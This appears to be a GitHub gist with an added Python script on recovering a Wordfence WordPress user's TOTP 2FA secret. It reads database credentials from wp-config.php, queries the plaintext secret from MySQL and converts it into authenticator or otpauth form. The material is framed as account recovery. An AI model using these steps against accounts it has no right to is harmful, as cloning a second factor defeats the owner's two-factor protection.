@CodingKoopa
Created January 20, 2025 20:50
Recover Wordfence 2FA Secret

Wordfence is a WordPress plugin used to protect against automated attacks. Given access to MySQL (and the MySQL credentials), you can recover the TOTP secret for an account. As discussed in this blog post, Wordfence stores 2FA secrets in plaintext (technically in binary, in a MySQL table). This still works as of Wordfence 8.0.3, but you can check the TOTP source code to see if additional security has been added.

  1. Obtain the database credentials. These can be found in wp-config.php in the WP root. You want $table_prefix (if multiple WP installs), DB_NAME, DB_USER, and DB_PASSWORD. DB_HOST is assumed to be localhost.

  2. Connect to the database:

    $ mysql --host=$DB_HOST --user=$DB_USER --password=$DB_PASSWORD $DB_NAME

  3. Orient yourself using SHOW TABLES;. You should see tables starting with $table_prefix.

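  4. Obtain the desired $USER_ID (the ID column) from the output of the query below. $table_prefix normally already ends in an underscore (the WordPress default is wp_), so the table name is the prefix followed directly by users:

    mysql> SELECT * FROM ${table_prefix}users;

  5. Copy the $TOTP_SECRET (the hex representation of the secret) from the output of the query below, which matches on the table's user_id column:

    mysql> SELECT HEX(secret) FROM ${table_prefix}wfls_2fa_secrets WHERE user_id = $USER_ID;
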
  6. Convert to base-32 using Python:

    >>> import base64
    >>> base64.b32encode(bytearray.fromhex("$TOTP_SECRET")).decode('utf-8')

  7. Stick the secret in your favorite authenticator application.
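
An added example, not part of the original gist: steps 6 and 7 as one script that converts the `HEX(secret)` output to base-32, builds an enrolment URI, and computes the code for a given time so you can confirm your authenticator shows the same value. It assumes standard RFC 6238 parameters (HMAC-SHA-1, 6 digits, 30-second period), which the gist does not state; the function names, account and issuer are hypothetical, and the sample secret is the RFC 6238 test key.

```python
import base64
import hashlib
import hmac
import struct
from urllib.parse import quote

# Constructed sample: the RFC 6238 test key ("12345678901234567890")
# in the form MySQL's HEX(secret) would print it.
SAMPLE_HEX = "3132333435363738393031323334353637383930"


def hex_to_base32(hex_secret: str) -> str:
    """Convert MySQL HEX() output to the base-32 form authenticator apps expect."""
    raw = bytes.fromhex(hex_secret.strip())
    if not raw:
        raise ValueError("empty secret: the query matched no row")
    # Authenticator apps accept unpadded base-32, so drop trailing '='.
    return base64.b32encode(raw).decode("ascii").rstrip("=")


def totp(hex_secret: str, unix_time: int, digits: int = 6, period: int = 30) -> str:
    """RFC 6238 TOTP with HMAC-SHA-1 (assumed parameters, see lead-in)."""
    key = bytes.fromhex(hex_secret.strip())
    counter = struct.pack(">Q", unix_time // period)
    mac = hmac.new(key, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation (RFC 4226, section 5.3)
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def otpauth_uri(hex_secret: str, account: str, issuer: str) -> str:
    """Key URI that can be rendered as a QR code for enrolment."""
    label = quote(f"{issuer}:{account}")
    return (f"otpauth://totp/{label}?secret={hex_to_base32(hex_secret)}"
            f"&issuer={quote(issuer)}")


if __name__ == "__main__":
    import time
    print(hex_to_base32(SAMPLE_HEX))
    print(totp(SAMPLE_HEX, int(time.time())))
    print(otpauth_uri(SAMPLE_HEX, "admin", "example.com"))
```

If the code printed here and the one in your authenticator disagree, check the server's clock and that the row you selected belongs to the intended user.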
